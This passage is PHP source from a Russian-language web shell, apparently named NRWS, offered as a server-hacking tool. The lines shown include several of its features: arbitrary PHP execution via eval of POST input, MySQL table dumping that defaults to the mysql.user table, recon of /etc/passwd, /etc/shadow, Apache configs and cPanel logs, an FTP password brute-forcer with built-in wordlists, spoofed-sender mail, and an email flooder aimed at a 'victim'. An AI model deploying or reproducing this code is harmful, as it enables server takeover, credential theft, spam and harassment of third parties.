  443. if(@mysql_select_db($_POST['mysql_db'],$db))
  444. {
  445. // инфа о дампе
  446. $sql1 = "# MySQL dump created by NRWS\r\n";
  447. $sql1 .= "# homepage: http://www.Ru24-Team.NET\r\n";
  448. $sql1 .= "# ---------------------------------\r\n";
  449. $sql1 .= "# date : ".date ("j F Y g:i")."\r\n";
  450. $sql1 .= "# database : ".$_POST['mysql_db']."\r\n";
  451. $sql1 .= "# table : ".$_POST['mysql_tbl']."\r\n";
  452. $sql1 .= "# ---------------------------------\r\n\r\n";
  453. // получаем текст запроса создания структуры таблицы
  454. $res = @mysql_query("SHOW CREATE TABLE `".$_POST['mysql_tbl']."`", $db);
  455. $row = @mysql_fetch_row($res);
  456. $sql1 .= $row[1]."\r\n\r\n";
  457. $sql1 .= "# ---------------------------------\r\n\r\n";
  458. $sql2 = '';
  459. // получаем данные таблицы
  460. $res = @mysql_query("SELECT * FROM `".$_POST['mysql_tbl']."`", $db);
  461. if (@mysql_num_rows($res) > 0) {
  462. while ($row = @mysql_fetch_assoc($res)) {
  463. $keys = @implode("`, `", @array_keys($row));
  464. $values = @array_values($row);
  465. foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
  466. $values = @implode("', '", $values);
  467. $sql2 .= "INSERT INTO `".$_POST['mysql_tbl']."` (`".$keys."`) VALUES ('".$values."');\r\n";
  468. }
  469. $sql2 .= "\r\n# ---------------------------------";
  470. }
  471. echo "<center><b>Готово! Дамп прошел удачно!</b></center>";
  472. // пишем в файл или выводим в браузер
  473. if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }
  474. else { echo $sql1.$sql2; }
  475. } // end if(@mysql_select_db($_POST['mysql_db'],$db))
  476. else echo "Такой БД нет!";
  477. @mysql_close($db);
  478. } // end if($db)
  479. else echo "Нет коннекта c сервером!";
  480. } // end if(($_POST['dif']&&$fp)||(!$_POST['dif'])){
  481. else if(!empty($_POST['dif'])&&!$fp) { echo "ОШИБКА, нет прав записи в файл!"; }
  482. break;
  483. // SQL Attack
  484. case "sql":
  485. echo "<form name='mysql_dump' action='?ac=damp' method='post'>";
  486. echo "&nbsp;База: &nbsp;<input type=text name=mysql_db size=15 value=";
  487. echo (!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"));
  488. echo ">";
  489. echo "&nbsp;Таблица: &nbsp;<input type=text name=mysql_tbl size=15 value=";
  490. echo (!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):("user"));
  491. echo ">";
  492. echo "&nbsp;Логин: &nbsp;<input type=text name=mysql_l size=15 value=";
  493. echo (!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"));
  494. echo ">";
  495. echo "&nbsp;Пароль: &nbsp;<input type=text name=mysql_p size=15 value=";
  496. echo (!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"));
  497. echo ">";
  498. echo "<input type=hidden name=dir size=85 value=".$dir.">";
  499. echo "<input type=hidden name=cmd size=85 value=mysql_dump>";
  500. echo "<br>&nbsp;Сохранить дамп в файле: <input type=checkbox name=dif value=1 id=dif><input type=text name=dif_name size=85 value=";
  501. echo (!empty($_POST['dif_name'])?($_POST['dif_name']):("dump.sql"));
  502. echo ">";
  503. echo "<input type=submit name=submit value=Сохранить>" ;
  504. echo "</font>";
  505. echo "</form>";
  506. print "<tr><td>";
  507. ###
  508. @$php_self=$_GET['PHP_SELF'];
  509. @$from=$_GET['from'];
  510. @$to=$_GET['to'];
  511. @$adress=$_POST['adress'];
  512. @$port=$_POST['port'];
  513. @$login=$_POST['login'];
  514. @$pass=$_POST['pass'];
  515. @$adress=$_GET['adress'];
  516. @$port=$_GET['port'];
  517. @$login=$_GET['login'];
  518. @$pass=$_GET['pass'];
  519. if(!isset($adress)){$adress="localhost";}
  520. if(!isset($login)){$login="root";}
  521. if(!isset($pass)){$pass="";}
  522. if(!isset($port)){$port="3306";}
  523. if(!isset($from)){$from=0;}
  524. if(!isset($to)){$to=50;}
  525. ?>
  526. <body vLink=white>
  527. <font color=black face=verdana size=1>
  528. <form> <? if(!@$conn){ ?>
  529. <table><tr><td valign=top>
  530. <input type=hidden name=ac value=sql>
  531. <tr><td valign=top>Хост: </tr><td><input name=adress value='<?=$adress?>' size=20></td></tr>
  532. <tr><td valign=top>Порт: </tr><td><input name=port value='<?=$port?>' size=6></td></tr>
  533. <tr><Td valign=top>Логин: </td><td><input name=login value='<?=$login?>' size=10></td></tr>
  534. <tr><Td valign=top>Пароль: </td><td> <input name=pass value='<?=$pass?>' size=10>
  535. <input type=hidden name=p value=sql></td></tr>
  536. <tr><td></td><td><input type=submit name=conn value=Подключиться></form></td></tr><?}?>
  537. <tr><td valign=top><? if(@$conn){ echo "<b>PHP v".@phpversion()."<br>mySQL v".@mysql_get_server_info()."<br>";}?></b></td><td>
  538. </td></tr>
  539. </table>
  540. <table width=100%><tr><td>
  541. <?
  542. @$conn=$_GET['conn'];
  543. @$adress=$_GET['adress'];
  544. @$port=$_GET['port'];
  545. @$login=$_GET['login'];
  546. @$pass=$_GET['pass'];
  547. if($conn){
  548. $serv = @mysql_connect("$adress:$port", "$login", "$pass") or die("ОШИБКА: ".mysql_error());
  549. if($serv){$status="Подключен. :: <a href='$php_self?conn=0'>Выйти из базы</a>";}else{$status="Отключен.";}
  550. print "<b><font color=green>Статус: $status<br><br>";
  551. print "<table cellpadding=0 cellspacing=0><tr><td valign=top>";
  552. print "<font color=red>[Таблицы]</font><Br><font color=white>";
  553. $res = mysql_list_dbs($serv);
  554. while ($str=mysql_fetch_row($res)){
  555. print "<b><a href='$php_self?ac=sql&base=1&db=$str[0]&p=sql&login=$login&pass=$pass&adress=$adress&conn=1&tbl=$str[0]'>$str[0]</a></b><br>";
  556. @$tc++;
  557. }
  558. $pro="&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;";
  559. @$base=$_GET['base'];
  560. @$db=$_GET['db'];
  561. print "<font color=red>[Всего таблиц: $tc]</font><br>$pro";
  562. if($base){
  563. print "<div align=left><font color=green>Таблица: [$tbl]</div></font><br>";
  564. $result=mysql_list_tables($db);
  565. while($str=mysql_fetch_array($result)){
  566. $c=mysql_query ("SELECT COUNT(*) FROM $str[0]");
  567. $records=mysql_fetch_array($c);
  568. print "<font color=red>[$records[0]]</font> <a href='$php_self?ac=sql&inside=1&p=sql&vn=$str[0]&base=1&db=$db&login=$login&pass=$pass&adress=$adress&conn=1&tbl=$str[0]'>$str[0]</a><br>";
  569. mysql_free_result($c);
  570. }
  571. } #end base
  572. @$vn=$_GET['vn'];
  573. print "</td><td valign=top>";
  574. print "<font color=green>База данных: $db => $vn</font>";
  575. @$inside=$_GET['inside'];
  576. @$tbl=$_GET['tbl'];
  577. if($inside){
  578. print "<table cellpadding=0 cellspacing=1><tr>";
  579. mysql_select_db($db) or die(mysql_error());
  580. $c=mysql_query ("SELECT COUNT(*) FROM $tbl");
  581. $cfa=mysql_fetch_array($c);
  582. mysql_free_result($c);
  583. print "&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br>";
  584. print "
  585. Всего: $cfa[0]<form>
  586. <input type=hidden name=ac value=sql>
  587. От: <input name=from size=3 value=0>
  588. До: <input name=to size=3 value=$cfa[0]>
  589. <input type=submit name=show value=Показать>
  590. <input type=hidden name=inside value=1>
  591. <input type=hidden name=vn value=$vn>
  592. <input type=hidden name=db value=$db>
  593. <input type=hidden name=login value=$login>
  594. <input type=hidden name=pass value=$pass>
  595. <input type=hidden name=adress value=$adress>
  596. <input type=hidden name=conn value=1>
  597. <input type=hidden name=base value=1>
  598. <input type=hidden name=p value=sql>
  599. <input type=hidden name=tbl value=$tbl>
  600. [<a href='$php_self?ac=sql&getdb=1&to=$cfa[0]&inside=1&vn=$vn&db=$db&login=$login&pass=$pass&adress=$adress&conn=1&base=1&p=sql&tbl=$tbl'>Загрузить</a>]
  601. </form>";
  602. @$vn=$_GET['vn'];
  603. @$from=$_GET['from'];
  604. @$to=$_GET['to'];
  605. @$from=$_GET['from'];
  606. @$to=$_GET['to'];
  607. if(!isset($from)){$from=0;}
  608. if(!isset($to)){$to=50;}
  609. $query = "SELECT * FROM $vn LIMIT $from,$to";
  610. $result = mysql_query($query);
  611. for ($i=0;$i<mysql_num_fields($result);$i++){
  612. $name=mysql_field_name($result,$i);
  613. print "<td>&nbsp;</td><td bgcolor=#BCE0FF> $name </td> ";
  614. }
  615. print "</tr>";
  616. while($mn = mysql_fetch_array($result, MYSQL_ASSOC)){
  617. print "<tr>";
  618. foreach ($mn as $come=>$lee) {
  619. $nst_inside=htmlspecialchars($lee);
  620. print "<td>&nbsp;</td><td bgcolor=silver>$nst_inside</td>\r\n";
  621. } print "</tr>";
  622. }
  623. mysql_free_result($result);
  624. print "</table>";
  625. } #end inside
  626. print "</td></tr></table>";
  627. } # end $conn
  628. ### end of sql
  629. print "</tr></td></table> </td></tr></table>";
  630. print $copyr;
  631. die;
  632. break;
  633. //PHP Eval Code execution
  634. case "eval":
  635. echo <<<HTML
  636. <b>Исполнение php-кода (без "< ? ? >")</b>
  637. <table>
  638. <form method="POST" action="$self">
  639. <input type="hidden" name="ac" value="eval">
  640. <tr>
  641. <td><textarea name="ephp" rows="10" cols="60"></textarea></td>
  642. </tr>
  643. <tr>
  644. <td><input type="submit" value="Enter"></td>
  645. $tend
  646. HTML;
  647. if (isset($_POST['ephp'])){
  648. eval($_POST['ephp']);
  649. }
  650. break;
  651. // SEND MAIL
  652. case "sendmail":
  653. echo <<<HTML
  654. <table>
  655. <form method="POST" action="$self">
  656. <input type="hidden" name="ac" value="sendmail">
  657. <tr>От кого: <br>
  658. <input type="TEXT" name="frommail">
  659. <br>Кому:<br> <input type="TEXT" name="tomailz">
  660. <br>Тема: <br><input type="TEXT" name="mailtema">
  661. <br>Текст: <br>
  662. <td><textarea name="mailtext" rows="10" cols="60"></textarea></td>
  663. </tr>
  664. <tr>
  665. <td><input type="submit" value="Отправить" name="submit"></td><form>
  666. $tend
  667. HTML;
  668. // никакая проверка не делается, а зачем ? =)
  669. if (isset($submit))
  670. {
  671. mail($tomailz,$mailtema,$mailtext,"From: $frommail");
  672. echo "<h2>Сообщение отправлено!</h2>";
  673. }
  674. break;
  675. // Информация о системе
  676. case "info":
  677. if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
  678. {
  679. $safemode = true;
  680. $hsafemode = "<font color=\"red\">Включено</font>";
  681. }
  682. else {$safemode = false; $hsafemode = "Отключено</font>";}
  683. /* display information */
  684. echo "<b>[ Информация о системе ]</b><br>";
  685. echo "<b>Хост:</b> ".$_SERVER["HTTP_HOST"]."<br>" ;
  686. echo "<b>IP сервера:</b> ".gethostbyname($_SERVER["HTTP_HOST"])."<br>";
  687. echo " <b>Сервер: </b>".$_SERVER['SERVER_SIGNATURE']." ";
  688. echo "<b>OC:</b> ".exec("uname -a")."(";
  689. print "".php_uname()." )<br>\n";
  690. echo "<b>Процессор:</b> ".exec("cat /proc/cpuinfo | grep GHz")."<br>";
  691. echo "<b>Привилегии: </b>".exec("id")."<br>";
  692. echo "<b>Всего места: </b>" . (int)(disk_total_space(getcwd())/(1024*1024)) . " MB " . "<b>Свободно</b>: " . (int)(disk_free_space(getcwd())/(1024*1024)) . " MB <br>";
  693. echo "<b>Текущий каталог:</b>".exec("pwd")."";
  694. echo " <br><b>Текуший web-путь: </b>".@$_SERVER['PHP_SELF']." ";
  695. echo "<br><b>Твой IP:</b> ".$_SERVER['REMOTE_HOST']." (".$_SERVER['REMOTE_ADDR'].")<br>";
  696. echo "<b>PHP version: </b>".phpversion()."<BR>";
  697. echo "<b> ID владельца процеса: </b>".get_current_user()."<BR>";
  698. echo "<b>MySQL</b> : ".mysql_get_server_info()."<BR>";
  699. if(file_exists('/etc/passwd') && is_readable('/etc/passwd')){
  700. print '<b>Есть доступ к /etc/passwd! </b><br>';
  701. }
  702. if(file_exists('/etc/shadow') && is_readable('/etc/shadow')){
  703. print '<b>Есть доступ к /etc/shadow!</b> <br>';
  704. }
  705. if(file_exists('/etc/shadow-') && is_readable('/etc/shadow-')){
  706. print '<b>Есть доступ к /etc/shadow-!</b> ';
  707. }
  708. if(file_exists('/etc/master.passwd') && is_readable('/etc/master.passwd')){
  709. print '<b>Есть доступ к /etc/master.passwd! </b><br>';
  710. }
  711. if(isset($_POST['th']) && $_POST['th']!=''){
  712. chdir($_POST['th']);
  713. };
  714. if(is_writable('/tmp/')){
  715. $fp=fopen('/tmp/qq8',"w+");
  716. fclose($fp);
  717. print "/tmp - открыта&nbsp;<br>\n";
  718. unlink('/tmp/qq8');
  719. }
  720. else{
  721. print "<font color=red>/tmp - не открыта</font><br>";
  722. }
  723. echo "<b>Безопасный режим: ".$hsafemode."</b><br>";
  724. if ($nixpasswd)
  725. {
  726. if ($nixpasswd == 1) {$nixpasswd = 0;}
  727. $num = $nixpasswd + $nixpwdperpage;
  728. echo "<b>*nix /etc/passwd:</b><br>";
  729. $i = $nixpasswd;
  730. while ($i < $num)
  731. {
  732. $uid = posix_getpwuid($i);
  733. if ($uid) {echo join(":",$uid)."<br>";}
  734. $i++;
  735. }
  736. }
  737. else {echo "<br><a href=?ac=navigation&d=/etc/&e=passwd><b><u>Get /etc/passwd</u></b></a><br>";}
  738. if (file_get_contents("/etc/userdomains")) {echo "<b><a href=\"".$surl."act=f&f=userdomains&d=/etc/&ft=txt\"><u><b>View cpanel user-domains logs</b></u></a></b><br>";}
  739. if (file_get_contents("/var/cpanel/accounting.log")) {echo "<b><a href=\"".$surl."act=f&f=accounting.log&d=/var/cpanel/&ft=txt\"><u><b>View cpanel logs</b></u></a></b><br>";}
  740. if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "<b><a href=?ac=navigation&d=/usr/local/apache/conf&e=httpd.conf><u><b>Конфигурация Apache (httpd.conf)</b></u></a></b><br>";}
  741. { echo "<b><a href=?ac=navigation&d=/etc/httpd/conf&e=httpd.conf><u><b>Конфигурация Apache (httpd.conf)</b></u></a></b><br>";}
  742. if (file_get_contents("/etc/httpd.conf")) {echo "<b><a href=?ac=navigation&d=/etc/&e=httpd.conf><u><b>Конфигурация Apache (httpd.conf)</b></u></a></b><br>";}
  743. if (file_get_contents("/etc/httpd.conf")) {echo "<b><a href=?ac=navigation&d=/var/cpanel&e=accounting.log><u><b>cpanel log </b></u></a></b><br>";}
  744. break;
  745. // О скрипте
  746. case "about":
  747. echo "<center><b>Привет всем!</b><br><br>
  748. Наконец-то NWRS доступен в первой стабильной версии! Добавилось множество новых полезных возможностей. Все функции скрипта работают и работают корректно. Добавлены уникальные инструменты для взлома сервера. В то же время нет ничего лишнего. Все, что задумывалось - реализировано. Думаю, каждый найдет в скрипте что-то полезное для себя. Также заявляю о том, что я закрываю проект, ибо он достиг идеала :) Любой может его продолжить, php - открытый язык. На первых порах скрипт вообще был только у нескольких человек узкого круга друзей, писал его для себя, из-за своей природной лени.
  749. Ну, и спасибо этим людям: Nitrex, Terabyte, 1dt_wolf, xoce, FUF, Shift, dodbob, m0zg, Tristram, Sanchous (орфография и дизайн)... И многим другим... Их идеи очень помогли воплотить в жизнь столь универсальный инструмент. Огромное спасибо им!<br><br><b>Помните: используя этот скрипт на чужих серверах, вы нарушаете закон :) Так что осторожнее.</b></center>";
  750. echo "<center><br><br><em>Посетите эти сайты, и вы всегда будете в курсе событий:</em><br><br>
  751. <a href='http://www.ru24-team.net'>www.ru24-team.net</a><br><br>
  752. <a href='http://www.web-hack.ru'>www.web-hack.ru</a><br><br>
  753. <a href='http://www.rst.void.ru'>www.rst.void.ru</a><br><br>
  754. <a href='http://www.hackru.info'>www.hackru.info</a><br><br>
  755. <a href='http://www.realcoding.net'>www.realcoding.net</a><br><br>
  756. <a href='http://www.ccteam.ru'>www.ccteam.ru</a><br><br>
  757. Извиняюсь, если кого забыл.<br> <em>Автор не несет ответственности за материалы, размещенные на этих сайтах, оcобенно на последнем </em>:)
  758. <br><br><br><br><br><b>Скрипт распространяется по лицензии GNU GPL<br> 22 Июля 2005 г. &#169; DreAmeRz<br> e-mail:</b> <a href='mailto:dreamerz@mail.ru'>dreamerz@mail.ru</a><b> ICQ: </b>817312 <b>WEB: </b><a href='http://www.ru24-team.net'>http://www.Ru24-Team.NET</a>";
  759. break;
  760. // ФТП подбор паролей
  761. case "ftppass":
  762. $filename="/etc/passwd"; // passwd file
  763. $ftp_server="localhost"; // FTP-server
  764. echo "FTP-server: <b>$ftp_server</b> <br><br>";
  765. $fp = fopen ($filename, "r");
  766. if ($fp)
  767. {
  768. while (!feof ($fp)) {
  769. $buf = fgets($fp, 100);
  770. ereg("^([0-9a-zA-Z]{1,})\:",$buf,$g);
  771. $ftp_user_name=$g[1];
  772. $ftp_user_pass=$g[1];
  773. $conn_id=ftp_connect($ftp_server);
  774. $login_result=@ftp_login($conn_id, $ftp_user_name, $ftp_user_pass);
  775. if (($conn_id) && ($login_result)) {
  776. echo "<b>Подключение login:password - ".$ftp_user_name.":".$ftp_user_name."</b><br>";
  777. ftp_close($conn_id);}
  778. else {
  779. echo $ftp_user_name." - error<br>";
  780. }
  781. }}
  782. break;
  783. case "ftp":
  784. echo "
  785. <TABLE CELLPADDING=0 CELLSPACING=0 width=500 align=center>
  786. <form action='$PHP_SELF?ac=ftp' method=post><tr><td align=left valign=top colspan=3 class=pagetitle>
  787. <b><a href=?ac=ftppass>Проверить на связку login\password</a></b>
  788. </td></tr>
  789. <tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;FTP Host:</td>
  790. <td align=left width=350>&nbsp;&nbsp;&nbsp;
  791. <input class='inputbox' type='text' name='host' size=50></td></tr>
  792. <tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;Login:</td>
  793. <td align=left width=350>&nbsp;&nbsp;&nbsp;
  794. <input class='inputbox' type='text' name='login' size=50></td></tr>
  795. <tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;Колличество паролей:</td>
  796. <td align=left width=350>&nbsp;&nbsp;&nbsp;
  797. <input class='inputbox' type='text' name='number' size=10> <1000 pass </td></tr>
  798. <tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;Пароль для проверки:</td>
  799. <td align=left width=350>&nbsp;&nbsp;&nbsp;
  800. <input class='inputbox' type='text' name='testing' size=50>
  801. <input type='submit' value='Brut FTP' class=button1 $style_button><br><b>Лог сохраняется в pass.txt</b></td></tr>
  802. </form></table>";
  803. function s() {
  804. $word="qwrtypsdfghjklzxcvbnm";
  805. return $word[mt_rand(0,strlen($word)-1)];
  806. }
  807. function g() {
  808. $word="euioam";
  809. return $word[mt_rand(0,strlen($word)-2)];
  810. }
  811. function name0() { return s().g().s(); }
  812. function name1() { return s().g().s().g(); }
  813. function name2() { return s().g().g().s(); }
  814. function name3() { return s().s().g().s().g(); }
  815. function name4() { return g().s().g().s().g(); }
  816. function name5() { return g().g().s().g().s(); }
  817. function name6() { return g().s().s().g().s(); }
  818. function name7() { return s().g().g().s().g(); }
  819. function name8() { return s().g().s().g().g(); }
  820. function name9() { return s().g().s().g().s().g(); }
  821. function name10() { return s().g().s().s().g().s().s(); }
  822. function name11() { return s().g().s().s().g().s().s().g(); }
  823. $cool=array(1,2,3,4,5,6,7,8,9,10,99,100,111,111111,666,1978,1979,1980,1981,1982,1983,1984,1985,1986,1987,1988,1989,1990,1991,1992,1993,1994,1995,1996,1997,1998,1999,2000,2001,2002,2003,2004,2005);
  824. $cool2=array('q1w2e3','qwerty','qwerty111111','123456','1234567890','0987654321','asdfg','zxcvbnm','qazwsx','q1e3r4w2','q1r4e3w2','1q2w3e','1q3e2w','poiuytrewq','lkjhgfdsa','mnbvcxz','asdf','root','admin','admin123','lamer123','admin123456','administrator','administrator123','q1w2e3r4t5','root123','microsoft','muther','hacker','hackers','cracker');
  825. function randword() {
  826. global $cool;
  827. $func="name".mt_rand(0,11);
  828. $func2="name".mt_rand(0,11);
  829. switch (mt_rand(0,11)) {
  830. case 0: return $func().mt_rand(5,99);
  831. case 1: return $func()."-".$func2();
  832. case 2: return $func().$cool[mt_rand(0,count($cool)-1)];
  833. case 3: return $func()."!".$func();
  834. case 4: return randpass(mt_rand(5,12));
  835. default: return $func();
  836. }
  837. }
  838. function randpass($len) {
  839. $word="qwertyuiopasdfghjklzxcvbnm1234567890";
  840. $s="";
  841. for ($i=0; $i<$len; $i++) {
  842. $s.=$word[mt_rand(0,strlen($word)-1)];
  843. }
  844. return $s;
  845. }
  846. if (@unlink("pass.txt") < 0){
  847. echo "ничего нет";
  848. exit;
  849. }
  850. $file="pass.txt";
  851. if($file && $host && $login){
  852. $cn=mt_rand(30,30);
  853. for ($i=0; $i<$cn; $i++) {
  854. $s=$cool2[$i];
  855. $f=@fopen(pass.".txt","a+");
  856. fputs($f,"$s\n");
  857. }
  858. $cnt2=mt_rand(43,43);
  859. for ($i=0; $i<$cnt2; $i++) {
  860. $r=$cool[$i];
  861. $f=@fopen(pass.".txt","a+");
  862. fputs($f,"$login$r\n");
  863. }
  864. $p="$testing";
  865. $f=@fopen(pass.".txt","a+");
  866. fputs($f,"$p\n");
  867. $cnt3=mt_rand($number,$number);
  868. for ($i=0; $i<$cnt3; $i++) {
  869. $u=randword();
  870. $f=@fopen(pass.".txt","a+");
  871. fputs($f,"$u\n");
  872. }
  873. if(is_file($file)){
  874. $passwd=file($file,1000);
  875. for($i=0; $i<count($passwd); $i++){
  876. $stop=false;
  877. $password=trim($passwd[$i]);
  878. $open_ftp=@fsockopen($host,21);
  879. if($open_ftp!=false){
  880. fputs($open_ftp,"user $login\n");
  881. fputs($open_ftp,"pass $password\n");
  882. while(!feof($open_ftp) && $stop!=true){
  883. $text=fgets($open_ftp,4096);
  884. if(preg_match("/230/",$text)){
  885. $stop=true;
  886. $f=@fopen($host._ftp,"a+");
  887. fputs($f,"Enter on ftp:\nFTPhosting:\t$host\nLogin:\t$login\nPassword:\t$password\n ");
  888. echo "
  889. <TABLE CELLPADDING=0 CELLSPACING=0 width=500 align=center>
  890. <tr><td align=center class=pagetitle><b><font color=\"blue\">Поздравляю!!! Пароль подобран.</font></b><br>
  891. &nbsp;&nbsp;Коннект: <b>$host</b><br>&nbsp;&nbsp;Логин: <b>$login</b><br>&nbsp;&nbsp;Пароль: <b>$password</b></td></tr></table>
  892. ";exit;
  893. }
  894. elseif(preg_match("/530/",$text)){
  895. $stop=true;
  896. }
  897. }
  898. fclose($open_ftp);
  899. }else{
  900. echo "
  901. <TABLE CELLPADDING=0 CELLSPACING=0 width=500 align=center>
  902. <tr><td align=center class=pagetitle bgcolor=#FF0000><b>Неверно указан ftp хостинга!!! На <b><u>$host</u></b> закрыт 21 порт!</b></b></td></tr>
  903. </table>
  904. ";exit;
  905. }
  906. }
  907. }
  908. }
  909. break;
  910. // SQL Attack
  911. case "sql":
  912. break;
  913. // MailFlud
  914. case "mailfluder":
  915. $email=$_POST['email']; // Мыло жертвы
  916. $from=$_POST['from']; // Мыло жертвы
  917. $num=$_POST['num']; // Число писем
  918. $text=$_POST['text']; // Текст флуда
  919. $kb=$_POST['kb']; // Вес письма (kb)
  920. ?>
  921. <script language="JavaScript"><!--
  922. function reset_form() {
  923. document.forms[0].elements[0].value="";
  924. document.forms[0].elements[1].value="";
  925. document.forms[0].elements[2].value="";
  926. document.forms[0].elements[3].value="";
  927. document.forms[0].elements[4].value="";
  928. }
  929. //--></script>
  930. <?php
  931. if (($email!="" and isset($email)) and ($num!="" and isset($num)) and ($text!="" and isset($text)) and ($kb!="" and isset($kb))) {
  932. $num_text=strlen($text)+1; // Определяет длину текста + 1 (пробел в конце)
  933. $num_kb=(1024/$num_text)*$kb;
  934. $num_kb=ceil($num_kb);
  935. for ($i=1; $i<=$num_kb; $i++) {
  936. $msg=$msg.$text." ";
  937. }
  938. for ($i=1; $i<=$num; $i++) {
  939. mail($email, $text, $msg, "From: $from");
  940. }
  941. $all_kb=$num*$kb;
  942. echo <<<EOF
  943. <p align="center">Жертва: <b>$email</b><br>
  944. Кол-во писем: <b>$num</b><br>
  945. Общий посланный объем: <b>$all_kb kb</b><br></p>
  946. EOF;
  947. }
  948. else {
  949. echo <<<EOF
  950. <form action="?ac=mailfluder" method="post">
  951. <table align="center" border="0" bordercolor="#000000">
  952. <tr><td>Мыло жертвы</td><td><input type="text" name="email" value="to@mail.com" size="25"></td></tr>
  953. <tr><td>От липового мыла</td><td><input type="text" name="from" value="support@mail.com" size="25"></td></tr>
  954. <tr><td>Число писем</td><td><input type="text" name="num" value="5" size="25"></td></tr>
  955. <tr><td>Текст флуда</td><td><input type="text" name="text" value="fack fack fack" size="25"></td></tr>
  956. <tr><td>Вес письма (KB)</td><td><input type="text" name="kb" value="10" size="25"></td></tr>
  957. <tr><td colspan="2" align="center"><input type="submit">&nbsp;&nbsp;<input type="button" onclick="reset_form()" value="Reset"></td></tr>
  958. </table>
  959. </form>

Large files files are truncated, but you can click here to view the full file